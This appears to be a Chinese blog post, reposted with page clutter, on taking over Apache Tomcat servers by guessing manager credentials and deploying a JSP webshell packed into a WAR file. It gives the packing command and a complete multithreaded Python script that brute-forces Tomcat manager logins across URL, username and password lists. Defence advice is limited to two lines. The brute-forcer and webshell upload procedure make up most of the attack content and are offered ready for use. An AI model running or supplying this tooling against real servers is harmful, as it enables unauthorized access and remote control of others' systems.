php打war包,Tomcat部署War包getshell

最新推荐文章于 2024-04-24 11:07:32 发布
最新推荐文章于 2024-04-24 11:07:32 发布
阅读量287 收藏
点赞数
文章标签: php打war包

0x00 关于 War 包

War包一般是进行Web开发时一个网站Project下的所有代码,包括前台HTML/CSS/JS代码,

以及Java的代码。当开发人员开发完毕时,就会将源码打包给测试人员测试,测试完后若要发布

则也会打包成War包进行发布。War包可以放在Tomcat下的webapps或word目录,当Tomcat

服务器启动时,War包也会随之被解压后自动部署。

0x01 上传 War 包 GetShell

找到后台猜密码然后登录

4890228332614591aa30568a9e8f53e4.png

09858ce61a6e21963932c653feaeda89.png

c949a1c8d6d9b8e2e22702408cca3dae.png

上传 War 包

运行 jar -cf job.war ./job.jsp 生成 war 包

或者先将 jsp 大马压缩为 zip,再将 zip 后缀改名为 war ,然后上传 war 包

2ac0b8e1561ab87a3e5cc83ca472b35c.png

cbf32e3cd2dfb7c05ab2e9aa325acc00.png

6541e1e04b405a9646922ce0e2a94003.png

fc315bee115915b0833f5a0d90739ed1.png

0x02 漏洞防御

后台使用强密码

删除Tomcat下的manager文件夹

0x03 附爆破弱口令代码

#!/usr/bin/env python

#-*- coding:utf-8 -*-

import requests

import json

import base64

import sys

import Queue

import threading

"""

简单爆破后台登陆密码

Usage: python tomcat.py username.txt password.txt urlfile.txt

username.txt为用户名字典

password.txt为密码字典

urlfile.txt为后台url列表

"""

def get_username(userfile):

username = []

with open(userfile, 'r') as f:

lines = f.readlines()

for line in lines:

username.append(line.strip())

return username

def get_pwd(passfile):

password = []

with open(passfile, 'r') as f:

lines = f.readlines()

for line in lines:

password.append(line.strip())

return password

def get_url(urlfile):

urllist = Queue.Queue()

with open(urlfile,'r') as f:

lines = f.readlines()

for line in lines:

urllist.put(line.strip())

return urllist

def thread(f,urls,names,pwds):

while not urls.empty():

s = requests.Session()

url = urls.get()

resp = s.get(url,timeout=10) #用于记录cookie

Referer = resp.url

headers = {

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0',

'Referer': Referer,

}

bgurl = url + 'manager/html'

# print bgurl

for name in names:

for pwd in pwds:

authorize = name + ':' + pwd

Basic = "Basic " + base64.b64encode(authorize)

headers['Authorization'] = Basic

# print json.dumps(headers, indent=4)

proxy = {

'http':'http://127.0.0.1:1080'

}

resp = s.get(bgurl,headers=headers,proxies=proxy,timeout=10)

if resp.status_code == 200:

s = "[Ok] %s\t%s:%s" % (bgurl,name,pwd)

print s

f.write(s)

exit()

else:

print '[Error] ' + bgurl + '\t' + name + ':' + pwd

# break

def main():

if len(sys.argv) < 4:

print "Usage: python tomcat.py username.txt password.txt urlfile.txt"

exit()

userfile = sys.argv[1]

passfile = sys.argv[2]

urlfile = sys.argv[3]

names = get_pwd(userfile)

pwds = get_pwd(passfile)

urls = get_url(urlfile)

tlist = []

f = open("result.txt","a+")

for x in xrange(1,50):

t = threading.Thread(target=thread,args=(f,urls,names,pwds,))

tlist.append(t)

for t in tlist:

t.start()

t.join()

main()

若未作声明则文章版权归本人(@reber)所有,转载请注明原文链接:

weixin_39788382
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tomcat WAR部署getshell
aqi_sec的博客
07-06 2179
Tomcat WAR部署getshell
phpwar,Maven项目中War的打及依赖方式
weixin_39648297的博客
03-23 181
两个web项目之间的依赖引用方式。Web项目之间,通过war的方式进行引用的。例如,有两个项目,puzzle-web和puzzle-web-demo,两个均是web项目,puzzle-web-demo依赖于puzzle-web,具体配置如下(1)puzzle-web项目pom.xml中对打的相关配置 A、编译插件的版本要用2.4,否则,可以会出现打的war中,出现带有日期的jar。B、a...
Tomcat7部署wargetshell 漏洞复现
Boom!脑洞大爆炸的博客
07-07 946
Tomcat7部署wargetshell 漏洞复现
Tomcat弱口令后台部署wargetshell
最新发布
qq_59102311的博客
04-24 2229
3.点击Manager App,跳转http://127.0.0.1:8080/manager/html,要求登录验证。6.使用auxiliary/scanner/http/tomcat_mgr_login模块,查看详细信息。1.进入/vulhub/tomcat/tomcat8目录,启动docker。8.运行模块,爆破得出用户名和密码:tomcat:tomcat。13. 打开蚁剑,输入url,密码cmd,成功getshell。11.使用cmd命令,将jsp文件打war。7.设置目标IP和目标端口。
Tomcat弱口令进入后台部署wargetshell
weixin_50053818的博客
06-30 1007
文章目录环境docker+vuhub搭建环境爆破进入后台上传wargetshell 环境 vulhub docker-compose kali docker+vuhub搭建环境 通过git将vulhub仓库克隆到本地中。 ``` git clone https://github.com/vulhub/vulhub ``` 进入vulhub目录下的tomcat目录即可。 执行docker-compose up -d即可完成tomcat的搭建。 爆破进入后台 直接访问ip:port即可进入tomca
WAR,漏洞利用
10-16
下载了就知道了,上传后利用,需要肉鸡
Tomcat漏洞总结.rar
12-19
tomcat 漏洞总结 括后台暴力破解 幽灵猫getshell wargetshell 任意文件上传
linux下java项目部署
12-30
6. **项目部署**:将WAR文件复制到Tomcat的`webapps`目录下。Tomcat会自动检测新文件并部署它。若需自定义部署,可以编辑`conf/server.xml`中的`Host`元素,指定应用上下文路径。 7. **权限与安全**:确保Tomcat以...
Linux脚本制作 java web项目安装
04-20
`start.txt`可能含启动Tomcat部署应用的命令,如`/path/to/tomcat/bin/startup.sh`,然后将WAR文件拷贝到`/path/to/tomcat/webapps/`。 5. **服务自动化管理**: `stop.txt`可能含了停止Tomcat服务的命令,...
Jboss漏洞利用总结1
08-03
- 部署成功后,可以在 `jboss.web.deployment` 下观察到新部署WAR 。默认情况下,这些 Webshell 会被部署在 `\jboss-4.2.3.GA\server\default\tmp\deploy\` 目录,为了稳固权限,可以将 shell 移动到 `\jboss-...
php整站打工具(仅支持PHP环境)
01-08
PHP环境支持,直接放置在跟目录,直接访问即可备份。希望大家交流交流
网站的 war
06-03
网站的war,网站的war,网站的war,网站的war,网站的war,网站的war
phpwar,使用Gradle打war文件
weixin_39552538的博客
04-04 180
Gradle中有名称为war的task,负责war文件打,如果你的开发环境与发布环境完全相同,那么不需要任何配置,否则需要一些细微的调整。场景一:不将一些jar文件打war文件中例如jta、servlet、jsp等jar文件在开发环境中是必须使用的,但是不希望被打war中,那么可以:dependencies{providedRuntime'javax.servlet:jsp-api:...
【vulhub】Weblogic后台部署WarGetshell
qq_45300786的博客
04-13 2760
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟
Tomcat后台上传wargetshell复现
一瓶草莓酱的博客
03-17 3688
环境搭建 页面浏览: 漏洞简介 tomcat是apache软件基金会的核心项目,tomcat服务器是一个免费的开放源代码的web应用服务器,属于轻量级应用服务器。默认端口:8080 tomcat是一个中间件,在B/S架构中,浏览器发出的http请求经过tpmcat中间件,转发到最终的目的服务器上,响应消息再通过tomcat返回给浏览器。 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。 图中可以看到ma
phpwar,Spring Boot+maven打war的方法
weixin_39636717的博客
04-04 98
存在一个坑: 官网文档 指出以下前3步做法,但是这样只可以打出可运行的jar,要打出war还要在文档后面的链接跳到另一个页面,才能找到第四步的做法,也就是最终能够打出war,可能有些朋友有些粗心没找到第四步的链接,而以为只做了前三步就可以打出war了,结果一直出错,还以为自己的业务代码有问题,然后一直瞎折腾,浪费很多时间(比如我),因此我把整个过程写于此。1.指定war方式jar2.p...
php文件怎么做成war,怎么把war部署到docker
weixin_39790528的博客
03-12 108
怎么把war部署到docker将war放入到docker下的tomcat中的方法如下:1、首先你是需要把war放入到centos系统中,本文中将一个test.war的项目放入centos系统的主目录,这个通过ssh工具就可以放到centos中,大家应该都很熟悉,格式如下:scp local_file remote_username@remote_ip:remote_folder2、从cent...
【漏洞复现】Tomcat弱口令+后台getshell
m0_52450604的博客
02-07 674
【漏洞复现】Tomcat弱口令+后台getshell
war访问php,什么是war文件以及如何打开
weixin_42524750的博客
03-10 435
war文件是一种web应用程序格式,含了一个项目中所有源码的集合并按一定的目录结构组织,由于将所有文件合并成一个文件,因此节省了文件的传输时间。可以将其放在Tomcat下的webapps目录中打开并运行war文件war是一种web应用程序格式,含了web应用程序中的所有内容。在这个文件中的所有内容将按一定的目录结构来组织,一般情况下war文件中含了html,jsp文件或者含有这两种文件的目录...
idea打war部署tomcat
03-17
可以使用 Apache Ant 或 Apache Maven 工具来打 war 。具体步骤如下: 1. 使用 Ant 或 Maven 的 war 插件打应用程序。 2. 将 war 拷贝到 Tomcat 的 webapps 目录下。 3. 启动 Tomcat。 4. 访问 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值